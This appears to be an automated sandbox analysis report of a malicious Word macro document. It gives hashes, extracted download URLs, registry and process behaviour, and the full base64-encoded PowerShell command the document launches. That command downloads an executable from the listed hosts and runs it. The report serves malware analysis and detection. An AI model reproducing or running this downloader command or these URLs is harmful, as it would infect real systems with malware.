Analysis
-
max time kernel
121s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20240508-en -
resource tags
arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system -
submitted
31-05-2024 04:31
Behavioral task
behavioral1
Sample
85fa6b8a89c4af04c66873ff4efd28cc_JaffaCakes118.doc
Resource
win7-20240508-en
Behavioral task
behavioral2
Sample
85fa6b8a89c4af04c66873ff4efd28cc_JaffaCakes118.doc
Resource
win10v2004-20240508-en
General
-
Target
85fa6b8a89c4af04c66873ff4efd28cc_JaffaCakes118.doc
-
Size
197KB
-
MD5
85fa6b8a89c4af04c66873ff4efd28cc
-
SHA1
97bbd33e403a112f477279976c067326deea77e1
-
SHA256
6ab3c98c93e0973a6d291313199fb6afb3ee259509f1282acaa4673687b6880b
-
SHA512
6f09d18542ce036bc7d5a5f9b2f7df42f64a585c53bc2385c5d6912861de92cd6ab87c8b3ba34d36d21a1b67da9e0c7ec8faacf7147246019dbf26b44205ff64
-
SSDEEP
1536:PGGGGGGGGGG2xJLEt+LaaGGGGGGGGGGjLo9xilpfsdKY7xST/Ephkop8cEpTWj1L:xrfrzOH98ipgVEDvxBYSK
Malware Config
Extracted
https://houtai.xiaopbk.com/install/t0H/
https://gudangalami.com/ivo6rp/UaBj2/
https://webhostingsrilanka.info/pkrgs/ODn/
http://luzzeri.com/wp-includes/T1mrkC/
http://mobithem.com/blogs/Z3/
http://planosdesaudesemcarencia.com/erros/E8iv/
http://lookuppopup.co.uk/content/uploads/XNEm9/
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1264 2892 powershell.exe 28 -
Blocklisted process makes network request 9 IoCs
flow pid Process 3 1264 powershell.exe 7 1264 powershell.exe 8 1264 powershell.exe 10 1264 powershell.exe 11 1264 powershell.exe 13 1264 powershell.exe 14 1264 powershell.exe 16 1264 powershell.exe 18 1264 powershell.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE -
Office loads VBA resources, possible macro or embedded object present
-
description ioc Process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Internet Explorer\MenuExt WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\COMMAND WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor WINWORD.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit" WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Internet Explorer\Toolbar WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command WINWORD.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMAND WINWORD.EXE -
Modifies registry class 64 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Wow6432Node\Interface\{978C9E22-D4B0-11CE-BF2D-00AA003F40D0}\ = "LabelControlEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents4" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Interface\{944ACF93-A1E6-11CE-8104-00AA00611080}\ = "Tabs" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\topic\ = "system" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\ShellEx WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shellex\IconHandler WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Wow6432Node\Interface\{47FF8FE2-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents3" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Interface\{8BD21D32-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Interface\{04598FC9-866C-11CF-AB7C-00AA00C08FCF}\ = "IMultiPage" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Interface\{8BD21D43-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Interface\{5512D115-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Wow6432Node\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents4" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{9E60D2A8-A576-4A22-961E-60C9F057F487}\2.0\HELPDIR\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\VBE" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\topic WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Wow6432Node\Interface\{04598FC1-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Wow6432Node\Interface\{5B9D8FC8-4A71-101B-97A6-00000B65C08B}\ = "FormEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Wow6432Node\Interface\{04598FC2-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Wow6432Node\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Interface\{9A4BBF53-4E46-101B-8BBD-00AA003E3B29} WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Wow6432Node\Interface\{47FF8FE1-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Interface\{5512D11F-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\application WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{9E60D2A8-A576-4A22-961E-60C9F057F487}\2.0\ = "Microsoft Forms 2.0 Object Library" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Interface\{8BD21D33-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Interface\{5512D119-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Interface\{5512D119-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLOption" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\ = "&Edit" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\TypeLib\{9E60D2A8-A576-4A22-961E-60C9F057F487}\2.0\FLAGS WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074}\ = "IReturnString" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Interface\{7B020EC1-AF6C-11CE-9F46-00AA00574A4F} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Wow6432Node\Interface\{5CEF5613-713D-11CE-80C9-00AA00611080} WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon\ = "\"%1\"" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Interface\{8BD21D63-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcToggleButton" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Interface\{5512D125-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Wow6432Node\Interface\{79176FB2-B7F2-11CE-97EF-00AA006D2776} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776}\ = "ISpinbutton" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Interface\{5512D11D-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLHidden" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Interface\{47FF8FE8-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents9" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Interface\{CF3F94A0-F546-11CE-9BCE-00AA00608E01}\ = "OptionFrameEvents" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Interface\{5CEF5613-713D-11CE-80C9-00AA00611080} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB}\ = "Font" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Wow6432Node\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\ = "[open(\"%1\")]" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{9E60D2A8-A576-4A22-961E-60C9F057F487}\2.0\FLAGS\ = "6" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Wow6432Node\Interface\{CF3F94A0-F546-11CE-9BCE-00AA00608E01} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Wow6432Node\Interface\{4C599243-6926-101B-9992-00000B65C6F9}\ = "IImage" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Interface\{5512D123-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Interface\{5CEF5613-713D-11CE-80C9-00AA00611080}\ = "IPage" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Wow6432Node\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074}\ = "IReturnEffect" WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 1500 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 1264 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1264 powershell.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 1500 WINWORD.EXE 1500 WINWORD.EXE -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 1500 wrote to memory of 2844 1500 WINWORD.EXE 34 PID 1500 wrote to memory of 2844 1500 WINWORD.EXE 34 PID 1500 wrote to memory of 2844 1500 WINWORD.EXE 34 PID 1500 wrote to memory of 2844 1500 WINWORD.EXE 34
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\85fa6b8a89c4af04c66873ff4efd28cc_JaffaCakes118.doc"1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1500 -
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵PID:2844
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -encod JABEAHcAdgBnAG4ANQBfAD0AKAAnAFkAawAnACsAKAAnADYAJwArACcAbQBrADgAaAAnACkAKQA7ACYAKAAnAG4AZQAnACsAJwB3ACcAKwAnAC0AaQB0AGUAbQAnACkAIAAkAEUATgB2ADoAdQBTAGUAcgBQAHIATwBmAGkATABFAFwARQBNAGsAcgBFAEwASwBcAHQAZwA4ADAAdQBSADEAXAAgAC0AaQB0AGUAbQB0AHkAcABlACAAZABJAFIAZQBDAHQATwBSAFkAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAFMAYABFAEMAVQBSAGAAaQBUAHkAUABSAGAAbwB0AE8AYwBgAE8ATAAiACAAPQAgACgAJwB0ACcAKwAnAGwAcwAnACsAKAAnADEAJwArACcAMgAsACcAKQArACgAJwAgAHQAbABzACcAKwAnADEAMQAnACsAJwAsACAAdABsAHMAJwApACkAOwAkAFYAbQBmAHoAdAA1ADMAIAA9ACAAKAAnAFYAdgAnACsAJwB2ACcAKwAoACcAcQBkAG0AJwArACcAMgAnACkAKQA7ACQASABuAHcAZQB1AHYANAA9ACgAJwBRACcAKwAoACcAeQB1ADkAJwArACcAagAnACsAJwB3AHMAJwApACkAOwAkAEEAdQAwAG4AbABxAHUAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAKAAoACgAJwBmACcAKwAnAGcASwAnACkAKwAoACcARQBtACcAKwAnAGsAcgBlACcAKQArACgAJwBsAGsAJwArACcAZgAnACsAJwBnAEsAVABnACcAKwAnADgAMAB1ACcAKQArACgAJwByACcAKwAnADEAZgBnAEsAJwApACkALgAiAFIARQBgAHAAYABMAGEAQwBFACIAKAAoAFsAQwBIAGEAUgBdADEAMAAyACsAWwBDAEgAYQBSAF0AMQAwADMAKwBbAEMASABhAFIAXQA3ADUAKQAsACcAXAAnACkAKQArACQAVgBtAGYAegB0ADUAMwArACgAKAAnAC4AZQAnACsAJwB4ACcAKQArACcAZQAnACkAOwAkAEoAdAB1ADUAcQA5AG0APQAoACgAJwBaACcAKwAnAHYAZQAnACkAKwAoACcAMAA4ACcAKwAnAGoAbwAnACkAKQA7ACQAVwBfAHEAdwAyAGwAaAA9AC4AKAAnAG4AZQB3AC0AJwArACcAbwBiAGoAJwArACcAZQAnACsAJwBjAHQAJwApACAATgBFAHQALgBXAEUAQgBDAEwAaQBlAE4AdAA7ACQARgByAHcAeQB6AHEAdgA9ACgAJwBoACcAKwAnAHQAdAAnACsAKAAnAHAAcwA6ACcAKwAnAC8ALwBoAG8AJwArACcAdQB0AGEAJwApACsAKAAnAGkALgAnACsAJwB4AGkAJwApACsAJwBhACcAKwAoACcAbwBwAGIAawAuAGMAbwAnACsAJwBtACcAKwAnAC8AJwArACcAaQBuACcAKQArACgAJwBzAHQAYQBsACcAKwAnAGwAJwApACsAKAAnAC8AdAAwACcAKwAnAEgALwAqACcAKQArACgAJwBoAHQAdAAnACsAJwBwAHMAJwApACsAJwA6AC8AJwArACcALwAnACsAKAAnAGcAJwArACcAdQBkAGEAbgAnACkAKwAoACcAZwBhAGwAJwArACcAYQAnACkAKwAoACcAbQAnACsAJwBpAC4AJwArACcAYwBvAG0ALwAnACkAKwAoACcAaQAnACsAJwB2ACcAKwAnAG8ANgByACcAKwAnAHAALwBVAGEAQgBqACcAKQArACgAJwAyACcAKwAnAC8AKgBoACcAKwAnAHQAdABwACcAKQArACcAcwA6ACcAKwAoACcALwAvAHcAZQAnACsAJwBiACcAKwAnAGgAbwBzAHQAaQAnACkAKwAnAG4AJwArACcAZwAnACsAJwBzACcAKwAnAHIAaQAnACsAJwBsACcAKwAoACcAYQBuACcAKwAnAGsAYQAnACkAKwAoACcALgBpAG4AJwArACcAZgBvAC8AJwArACcAcAAnACsAJwBrAHIAZwBzAC8ATwBEAG4ALwAnACkAKwAnACoAaAAnACsAKAAnAHQAJwArACcAdABwACcAKQArACcAOgAnACsAKAAnAC8AJwArACcALwBsAHUAJwApACsAKAAnAHoAegBlACcAKwAnAHIAJwArACcAaQAuAGMAJwApACsAJwBvAG0AJwArACcALwAnACsAKAAnAHcAJwArACcAcAAtACcAKQArACcAaQBuACcAKwAoACcAYwAnACsAJwBsAHUAZAAnACkAKwAnAGUAJwArACgAJwBzAC8AVAAxACcAKwAnAG0AcgAnACsAJwBrAEMALwAqACcAKwAnAGgAdAB0AHAAOgAvACcAKQArACgAJwAvAG0AJwArACcAbwAnACkAKwAoACcAYgBpAHQAJwArACcAaAAnACkAKwAnAGUAbQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAoACcAYgBsACcAKwAnAG8AZwBzAC8AJwApACsAJwBaADMAJwArACgAJwAvACcAKwAnACoAaAAnACkAKwAnAHQAJwArACcAdABwACcAKwAoACcAOgAvAC8AcAAnACsAJwBsACcAKQArACgAJwBhAG4AJwArACcAbwAnACkAKwAnAHMAJwArACcAZABlACcAKwAoACcAcwAnACsAJwBhAHUAJwApACsAJwBkAGUAJwArACgAJwBzACcAKwAnAGUAbQBjACcAKwAnAGEAcgBlAG4AJwApACsAJwBjAGkAJwArACgAJwBhAC4AJwArACcAYwBvACcAKwAnAG0ALwBlACcAKQArACgAJwByAHIAJwArACcAbwAnACkAKwAoACcAcwAvAEUAOAAnACsAJwBpACcAKQArACgAJwB2ACcAKwAnAC8AKgAnACkAKwAnAGgAdAAnACsAKAAnAHQAcAA6ACcAKwAnAC8ALwBsAG8AbwAnACkAKwAnAGsAdQAnACsAJwBwACcAKwAoACcAcAAnACsAJwBvAHAAJwApACsAJwB1ACcAKwAoACcAcAAuAGMAJwArACcAbwAuAHUAJwArACcAawAvAGMAJwArACcAbwAnACkAKwAoACcAbgB0ACcAKwAnAGUAbgB0AC8AJwArACcAdQBwAGwAbwBhAGQAJwArACcAcwAvAFgAJwApACsAKAAnAE4ARQAnACsAJwBtACcAKQArACcAOQAvACcAKQAuACIAUwBwAGAAbABJAFQAIgAoAFsAYwBoAGEAcgBdADQAMgApADsAJABXADYANwBfAGkANgBoAD0AKAAnAE0AdAAnACsAJwB6ACcAKwAoACcAeAAnACsAJwBuAGoAYwAnACkAKQA7AGYAbwByAGUAYQBjAGgAKAAkAEQAdwBxADMANABvADUAIABpAG4AIAAkAEYAcgB3AHkAegBxAHYAKQB7AHQAcgB5AHsAJABXAF8AcQB3ADIAbABoAC4AIgBEAGAAbwB3AE4AbABPAGAAQQBkAEYAYABJAGwARQAiACgAJABEAHcAcQAzADQAbwA1ACwAIAAkAEEAdQAwAG4AbABxAHUAKQA7ACQAQwBpAGQAdgA0ADgAawA9ACgAKAAnAEEAMgAnACsAJwBmADAAcQAnACkAKwAnADUAcQAnACkAOwBJAGYAIAAoACgAJgAoACcARwBlAHQAJwArACcALQAnACsAJwBJAHQAZQBtACcAKQAgACQAQQB1ADAAbgBsAHEAdQApAC4AIgBMAGUAYABOAGcAVABoACIAIAAtAGcAZQAgADIANwA2ADkANQApACAAewAuACgAJwBJAG4AdgBvAGsAZQAtACcAKwAnAEkAJwArACcAdABlAG0AJwApACgAJABBAHUAMABuAGwAcQB1ACkAOwAkAFQAYgBvADEAcwBkAHQAPQAoACgAJwBGACcAKwAnAG0AOAAnACkAKwAnAGkAJwArACgAJwB6ACcAKwAnAHMAMQAnACkAKQA7AGIAcgBlAGEAawA7ACQAWAA2AHkAZwA0AGEAXwA9ACgAJwBOADAAJwArACgAJwBzAHoAJwArACcAagAnACkAKwAnADgAeQAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEkAbQB3AGgAeQB0AHYAPQAoACcATwAnACsAKAAnAGoAJwArACcAdgB1AG8AZQBtACcAKQApAA==1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1264
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
20KB
MD5c9d5b76f60063a86230dc3742d2bd346
SHA13542f357ed8a38c2b1538d0b9c359881d3e0c9a6
SHA256ef28a7ce70c9745559edc2425c60236e6c78656e79a45f1dd3f2fcf82f6074ff
SHA512d87f5276b507253c3d7a9c15b8c1ea69bc689eed54ee6439538877182d4a914fb367bb70615d7751e02e58ebcacb203521e72a3df41eec41fbdeaa03990d48e3